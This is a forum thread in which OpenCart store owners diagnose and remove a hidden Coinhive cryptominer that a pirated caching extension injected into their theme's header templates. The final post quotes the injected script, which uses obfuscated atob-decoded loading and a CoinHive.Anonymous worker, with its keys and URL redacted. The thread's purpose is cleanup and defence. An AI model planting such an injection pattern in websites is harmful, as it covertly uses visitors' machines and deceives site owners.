Post by sayedsrkkhan » Thu Jul 12, 2018 9:50 pm

Hello All,
Recently i have installed nitropack in my opencart store(2.3.0.2), after installation i got security issues in kespersky ,i am trying found solution from google but i cant got it in any solution.
Kindly Check image.
Can you please provide me some solution.
https://imgur.com/a/2xRkTkD

New member

Posts

Joined
Wed Apr 18, 2018 5:49 pm

Post by IP_CAM » Fri Jul 13, 2018 12:59 am

Well, it's not the Nitro Extension, but a Troyan Miner, you have on your Site,
probably, by downloading/installing an infected Extension. At least, if you got
a legal copy of the Nitro Extension! :D
Some of those hidden Miners even made it into the OC Extension Section ... :o
Ernie
---
Image

Attachments

coinhive_badcode.jpg

coinhive_badcode.jpg (58.14 KiB) Viewed 915 times


For Sale: Turnkey URLs with Opencart installed!
Latest Opencart LIGHT + V-Pro Test Site: http://www.hitline.info
Attacker IP Ranges are denied from further accessing my Sites.
For more Information, please contact me at: jti@jacob.ch
635 + free Mod-Repositories - from OC v.1.5.x up
on the largest Github Opencart Site: https://github.com/IP-CAM
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by sayedsrkkhan » Fri Jul 13, 2018 1:02 pm

Thank You for your reply,
So what can i do now??
How can i remove it.

New member

Posts

Joined
Wed Apr 18, 2018 5:49 pm

Post by IP_CAM » Fri Jul 13, 2018 8:34 pm

Well, just de-install all of your OcMod/VqMod Extensions, and then,
check the Soure of all the Extensions, before installing one of them,
to find out, if one of them possibly includes such 'outside' link url's.
But if you don't know, how all this works, you'll need Pro assistance.
Good Luck ;)
Ernie
----
viewtopic.php?f=179&t=202333&p=726235&h ... ve#p726235
---
viewtopic.php?f=198&t=202043&p=719252&h ... ve#p719252
---

For Sale: Turnkey URLs with Opencart installed!
Latest Opencart LIGHT + V-Pro Test Site: http://www.hitline.info
Attacker IP Ranges are denied from further accessing my Sites.
For more Information, please contact me at: jti@jacob.ch
635 + free Mod-Repositories - from OC v.1.5.x up
on the largest Github Opencart Site: https://github.com/IP-CAM
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by sayedsrkkhan » Fri Jul 13, 2018 11:03 pm

YEah ,finally i found it in header.tpl and uninstall the extension (nitro pack cache free version) working good but when i see my cookies and refresh my website the coinhive is there now how can we remove it completely.

New member

Posts

Joined
Wed Apr 18, 2018 5:49 pm

Post by IP_CAM » Fri Jul 13, 2018 11:48 pm

nitro pack cache free version
Well, there is no such thing as a Nitro Pack free Version, according
to my knowledge ! ::) Better get rid of any stolen Crab, it only exists, to serve
others purposes.
Ernie

For Sale: Turnkey URLs with Opencart installed!
Latest Opencart LIGHT + V-Pro Test Site: http://www.hitline.info
Attacker IP Ranges are denied from further accessing my Sites.
For more Information, please contact me at: jti@jacob.ch
635 + free Mod-Repositories - from OC v.1.5.x up
on the largest Github Opencart Site: https://github.com/IP-CAM
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by deepankar_sen » Wed Jan 30, 2019 7:19 pm

coinhive (mining crypto currency from your websites by using machines open on different browser) you can remove in below folders :

/Users/apple/Documents/Check/catalog/view/theme/journal2/template/common/header.tpl
/Users/apple/Documents/Check/catalog/view/theme/default/template/common/header.tpl
/Users/apple/Documents/Check/system/storage/modification/catalog/view/theme/journal2/template/common/header.tpl
/Users/apple/Documents/Check/system/storage/modification/catalog/view/theme/default/template/common/header.tpl

Easy way to check any backlinks , do inspect element and click on source you can check outside urls.

I found this script on template: <script> document.write("<script type='text/javascript' src='"+ atob('--------==') + "'><\/scr" + "ipt>");</script><script> var jsworker = new CoinHive.Anonymous('----',{throttle: 0.2,forceASMJS: false});jsworker.start(atob('----=='));</script>.

Newbie

Posts

Joined
Wed Jan 30, 2019 7:12 pm
Who is online

Users browsing this forum: No registered users and 2 guests